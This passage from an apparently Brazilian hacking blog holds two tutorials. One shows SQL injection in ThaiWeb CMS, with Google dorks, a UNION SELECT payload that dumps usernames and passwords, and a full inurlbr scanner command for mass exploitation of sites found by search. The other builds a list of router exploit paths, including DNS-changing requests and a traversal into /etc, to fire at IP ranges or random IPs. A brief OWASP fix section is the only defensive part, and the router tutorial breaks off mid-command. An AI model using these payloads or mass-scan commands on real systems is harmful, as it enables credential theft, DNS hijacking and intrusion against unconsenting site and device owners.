Testei alguns módulos e todos se mostraram completamente capazes de fornecer um grande auxilio para garotada que quer passar o tempo ou simplesmente começar estudar esse ramo.</div>
<div>
<b><br /></b></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[</span><span style="font-size: large;">0x04</span><span style="font-size: large;">] </span></b><span style="color: red; font-size: large;"><b>Exploit exercises</b></span></span></div>
<div>
<span style="color: red; font-size: large;"><b> </b></span><b>[0x04a] Download</b></div>
<div>
<b> <a href="https://exploit-exercises.com/" target="_blank">https://exploit-exercises.com/</a></b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
0x4h4xhttp://www.blogger.com/profile/15701173647037587709noreply@blogger.com3tag:blogger.com,1999:blog-5670232360751087799.post-67965490368420607372015-07-25T03:50:00.000-03:002015-07-25T03:55:21.664-03:00ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability<h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yJU4DTvHnGCG2xonl14KZ84YUpfc-4D6mpdmDSO47mO7iX1NHiDWAnoKvyhcP8S84cvuEO-SezIHmAq98MhbDGL3ou00qxOUNT98tS_fCmTPTvh-m_79tCjXK81Jp4yY0NXra40n7qxv/s1600/bwlogos_06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation." border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yJU4DTvHnGCG2xonl14KZ84YUpfc-4D6mpdmDSO47mO7iX1NHiDWAnoKvyhcP8S84cvuEO-SezIHmAq98MhbDGL3ou00qxOUNT98tS_fCmTPTvh-m_79tCjXK81Jp4yY0NXra40n7qxv/s400/bwlogos_06.jpg" title="Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation." width="400" /></a></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage.<br />
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.<br />
<br />
We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.<br />
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Fail discovery by:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Iran Cyber Security Group - Pi.Hack (<a href="http://www.iran-cyber.org/" target="_blank">www.Iran-Cyber.Org</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Description:</span></b><br />
The vulnerabilities are located in the id_run value of the `index.php` file. <b>Remote</b> attackers are able to execute own sql commands by <b>manipulation </b>of the GET method request with the vulnerable id_run parameter. The <b>request</b> method to inject the <b><a href="http://blog.inurl.com.br/search/label/sql%20injection" target="_blank">sql command</a></b> is GET and the location of the issue is application-side.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">References (Source):</span></b><br />
<a href="http://www.vulnerability-lab.com/get_content.php?id=1555" target="_blank"><span style="font-family: Courier New, Courier, monospace;">http://www.vulnerability-lab.com/get_content.php?id=1555</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Release Date:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">2015-07-23</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Vulnerability Laboratory ID (VL-ID):</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">1555</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Common Vulnerability Scoring System:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">8.6</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Vendor Homepage:</b></span><br />
<a href="http://www.thaiweb.net/" target="_blank"><span style="font-family: Courier New, Courier, monospace;">http://www.thaiweb.net/</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Google Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">"Powered by ThaiWeb"</span><br />
<span style="font-family: Courier New, Courier, monospace;">"Reserved. Powered by Thaiweb."</span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"index.php" "Powered by Thaiweb"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>PoC:</b></span><br />
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">http://target/index.php?Content=product&id_run=</span><i style="font-family: 'Courier New', Courier, monospace;">[ID]'[SQL INJECTION VULNERABILITY!]</i></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">http://target/index.php?Content=product&id_run=</span><i style="font-family: 'Courier New', Courier, monospace;">-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--</i></li>
</ul>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Admin Page:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">www.target.com/_adminP/</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Using <a href="http://blog.inurl.com.br/search/label/inurlbr" target="_blank">inurlbr</a> scanner for mass exploitation:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a></span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Creating our command</span></b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">--dork 'YOU_DORK'</span><br />
<span style="font-family: Courier New, Courier, monospace;">OR</span><br />
<span style="font-family: Courier New, Courier, monospace;">--dork-file 'YOU_FILE_DORK.txt'</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET SEARCH ENGINES:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> all</span><br />
we will use all the search engines available in the script<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILTER RESULTS:</b></span><br />
<b><span style="color: red; font-family: Courier New, Courier, monospace;">--unique</span></b><br />
Filter results in unique domains.<br />
<div>
removes all gets the URL</div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-s</b> ThaiWeb.txt </span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET TIPE VALIDATION:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2</span><br />
2 The second type tries to valid the error defined by: <span style="color: red; font-family: Courier New, Courier, monospace;"><i><b>-a</b> 'VALUE_INSIDE_THE _TARGET'</i></span><br />
It also establishes connection with the exploit through the get method.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET EXPLOIT REQUEST - GET:</b></span><br />
--exploit-get {YOU_GET}<br />
<br />
<i>Before setting the exploit we get to <b>manipulate</b> its string, for that we use a domestic <b>function</b> of inurlbr scanner so passes a <b>validation</b> string within the SQL injection to be able to separate vulnerable targets.</i><br />
<br />
Internal function - Converting strings in <b>hexadecimal</b><br />
<b>hex</b> Encrypt values in hex.<br />
Example: <b>hex(</b>{value}<b>)</b><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>hex(</b>102030<b>)</b></span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get 'user?id=<b>hex(</b>102030<b>)</b>'</span><br />
Result inject:<br />
http://www.target.gov.br/user?id=313032303330<br />
<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/index.php?Content=product&id_run=<i>-12+union+select+1,2,3,group_concat%28user,</i><i>0x</i><b>hex(</b><i>:</i><b>)</b><i>,pws,</i><i>0x</i><b>hex(</b><i>:</i><b>)</b><i>,</i>0x<b>hex(</b><i>inurlbr_vuln</i><b>)%</b><i>29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'</i></span><br />
<br />
<b>hex(inurlbr_vuln)</b> = 696e75726c62725f76756c6e<br />
<b>hex(:)</b> = 3a<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example injection:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.gov.br</span><span style="color: red; font-family: Courier New, Courier, monospace;">/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x<b>3a</b>,pws,0x<b>3a</b>,0x<b>696e75726c62725f76756c6e%</b>29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
Specify the string that will be used on the search script:<br />
Example: <b>-a</b> {string}<br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<title>hello world</title>'</span><br />
If specific value is found in the target he is considered vulnerable.<br />
Setting: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span><br />
<br />
Let's validate the string "<b>inurlbr_vuln</b>" as she passed within the SQLI <b>exploit</b>, if such value appear on our target was <b>successfully injected</b>.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>OUTPUT PRINT:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidjzrARJrq52ZQz0VqyPUKu79lMQpQJHr3f3GdC9xr7PVxAZ19KqemSEJHmB_e6hwNkm6rW8eyg_XRSlXNY6J_TnIIMtCEIAVsMEtpDJZpdlxWghzUmDkkLCGcs2k8eR1j3glmbfrE9Vdo/s1600/Captura+de+tela+de+2015-07-25+03%253A11%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidjzrARJrq52ZQz0VqyPUKu79lMQpQJHr3f3GdC9xr7PVxAZ19KqemSEJHmB_e6hwNkm6rW8eyg_XRSlXNY6J_TnIIMtCEIAVsMEtpDJZpdlxWghzUmDkkLCGcs2k8eR1j3glmbfrE9Vdo/s640/Captura+de+tela+de+2015-07-25+03%253A11%253A08.png" title="Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>ADMIN PAINEL:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPxyzv1681dpx8GGxKw2hlBvuYH0UnAt6D_cxdTrdYFIAmwpBaiXXYWDYxh2tllA6Ndj_CvQGLmOvzzINqFktXvgHEGvIK-Ae8oP7PvcE8EpyTn3hMr5japMdgK0o_RZvyVP6ykPcqBla/s1600/Captura+de+tela+de+2015-07-25+03%253A40%253A14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation. THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach. We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally." border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPxyzv1681dpx8GGxKw2hlBvuYH0UnAt6D_cxdTrdYFIAmwpBaiXXYWDYxh2tllA6Ndj_CvQGLmOvzzINqFktXvgHEGvIK-Ae8oP7PvcE8EpyTn3hMr5japMdgK0o_RZvyVP6ykPcqBla/s640/Captura+de+tela+de+2015-07-25+03%253A40%253A14.png" title="ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation. THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach. We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND FULL:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> '"Powered by ThaiWeb"' <b>-s</b> ThaiWeb.txt <b>-q</b> all <b>-t</b> 2 <b>--unique</b> <b>-a</b> 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x<b>hex(</b>:<b>)</b>,pws,0x<b>hex(</b>:<b>)</b>,0x<b>hex(</b>inurlbr_vuln<b>)</b>%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OUTPUT PRINT:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3DvfESppSIyCof8a_gMwloGNp8bJxUV33Y1YVps8FWaBXG-C52d_1e6y_AAaK6hT_pOyyX9_MaM5t9OXpbX7_uCWMMppIymZjoEfmjYW9PulE7YlYCEVXAFEU-HVmvh-1wF5P7S3bMPAp/s1600/Captura+de+tela+de+2015-07-25+03%253A48%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user' OUTPUT PRINT:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3DvfESppSIyCof8a_gMwloGNp8bJxUV33Y1YVps8FWaBXG-C52d_1e6y_AAaK6hT_pOyyX9_MaM5t9OXpbX7_uCWMMppIymZjoEfmjYW9PulE7YlYCEVXAFEU-HVmvh-1wF5P7S3bMPAp/s640/Captura+de+tela+de+2015-07-25+03%253A48%253A26.png" title="COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user' OUTPUT PRINT:" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Source discovery: </b></span><br />
<a href="http://seclists.org/fulldisclosure/2015/Jul/109"><span style="font-family: Courier New, Courier, monospace;">http://seclists.org/fulldisclosure/2015/Jul/109</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Solution - Fix & Patch:</b></span><br />
The security <b>vulnerability</b> can be patched by a secure parse and encode of the vulnerable <b>id_run</b> parameter value in the index.php file.<br />
Restrict the input and use a prepared statement to secure the <b>sql</b> statement request via GET method.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Avoid SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>SQL Injection Prevention</b> Cheat Sheet.<br />
<a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</span></a><br />
See the OWASP <b>Query Parameterization</b> Cheat Sheet.<br />
<a href="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet</span></a><br />
See the OWASP <b>Guide article</b> on how to <b>Avoid SQL Injection Vulnerabilities</b>.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Guide_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Guide_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Guide_to_SQL_Injection" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Guide_to_SQL_Injection</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Review Code for SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>Code Review</b> Guide article on how to Review <b>Code for SQL Injection</b> Vulnerabilities.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Test for SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>Testing Guide</b> article on how to <b>Test for SQL Injection</b> Vulnerabilities.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Testing_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Testing_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</span></a>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com7tag:blogger.com,1999:blog-5670232360751087799.post-81576831048551597992015-07-20T04:33:00.000-03:002015-07-20T04:33:56.274-03:00INURLBR searching for routers<h3 style="text-align: center;">
In this short article we will use the <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a> tool for searching <a href="http://blog.inurl.com.br/search/label/router" target="_blank">routers</a> in certain ip ranges. </h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4eXUitTy3cHoKrqjKhbbX9G2OEan9J_Fi7b9Ey12-Q7MhxDMxChkpex_rONd0opIclzlh2ag2j3b-m0GkxQvF4e2f2uWgK2hESIYrccH_w0D6ene1KrZ1NbGXcueDw-bLz3EV-maK1MDq/s1600/Captura+de+tela+de+2015-07-20+04%253A33%253A39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido. Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation. We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers. Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS." border="0" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4eXUitTy3cHoKrqjKhbbX9G2OEan9J_Fi7b9Ey12-Q7MhxDMxChkpex_rONd0opIclzlh2ag2j3b-m0GkxQvF4e2f2uWgK2hESIYrccH_w0D6ene1KrZ1NbGXcueDw-bLz3EV-maK1MDq/s640/Captura+de+tela+de+2015-07-20+04%253A33%253A39.png" title="The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido. Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation. We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers. Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS." width="640" /></a></div>
<br />
The tool has methods that generate IP ranges or X amount of ip random.<br />
Separated several exploits routers, so we can use the method of <b>INURLBR</b> tool called <a href="http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html" target="_blank">SUB_PROCESS</a><br />
<i>SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download tool INURLBR:</span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br /><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SUB_PROCESS</span></b> - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the <b>tool</b> sends the <b>request</b> against its target to make possible the <b>validation</b>.<br />
<br />
We will use methods get and validate if the request was <b>successfully</b> executed retonando <b>code</b> 200.<br />
There will be no exploitation, let's just filtering routers.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Creating SUB_PROCESS file</b></span><br />
First we must create our <b>file</b> with the <b>exploration</b> of strings that will be used by SUB_PROCESS<br />
<i>Primeiro devemos criar nosso <b>arquivo</b> com as strings de <b>exploração</b> que serão usadas pelo SUB_PROCESS.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>File content:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
<span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dvr/wwwroot/user.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/web_cgi.cgi?&request=UploadFile&path=/etc/</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<span style="font-family: Courier New, Courier, monospace;">/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3</span><br />
<span style="font-family: Courier New, Courier, monospace;">/html/tUserAccountControl.htm</span><br />
<span style="font-family: Courier New, Courier, monospace;">/common/info.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/hedwig.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/tools_admin.asp</span><br />
<span style="font-family: Courier New, Courier, monospace;">/hnap.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/scdmz.cmd?&fwFlag=50853375&dosenbl=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/cliget.cgi?cmd=help</span><br />
<span style="font-family: Courier New, Courier, monospace;">/scgi-bin/platform.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/soap.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc</span><br />
<span style="font-family: Courier New, Courier, monospace;">/command.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">/authentication.cgi</span><br />
<div>
<br /></div>
<div>
Each line of the file will be concatenated with the <b>IP</b> <b>target</b> thus effecting request <b>testing</b> to validate that return code <b>http</b>.</div>
<div>
<i>Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de <b>request</b> para validar se retorno do <b>código</b> http.</i></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example:</span></b><br /><span style="font-family: Courier New, Courier, monospace;">http://TARGET<b>/{STRING_SUB_PROCESS}</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">http://200.16.3.***<b>/</b></span><span style="font-family: Courier New, Courier, monospace;"><b>dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?</b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">http://200.16.3.***</span><span style="font-family: Courier New, Courier, monospace;"><b>/tools_admin.asp</b></span></div>
<div>
<br /></div>
<div>
If the <b>HTTP</b> server return code <b>200</b> means that such a request has been <b>successfully performed</b>.</div>
<div>
<i>Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.</i></div>
<div>
<br /><span style="font-family: Courier New, Courier, monospace;">if(HTTP_CODE == 200){</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>VULN</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span><br /></div>
<div>
Now let's create our command to run the tool INURLBR.</div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>By setting command:</b></span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET RANGE IP:</span></b><br /><u>RANGE IP:</u></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --range Set range IP.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--range</b> {range_start,rage_end}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--range</b> '172.16.0.5,172.16.0.255'</span></span></div>
<div>
<br /></div>
<div>
<b>OR</b></div>
<div>
<br /><u>RANGE IP RANDOM:</u></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --range-rand Set amount of random ips.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--range-rand</b> {rand}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--range-rand</b> '50'</span></span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILE OUTPUT:</b></span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> vuln.txt</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILE SUB_PROCESS:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--sub-file Subprocess performs an injection </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> strings in URLs found by the engine, via GET or POST.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--sub-file</b> {youfile}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--sub-file</b> exploits_get.txt</span></span></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET TYPE OF REQUEST - SUB_PROCESS:</b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --sub-get defines whether the strings coming from </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --sub-file will be injected via GET.</span></div>
<div>
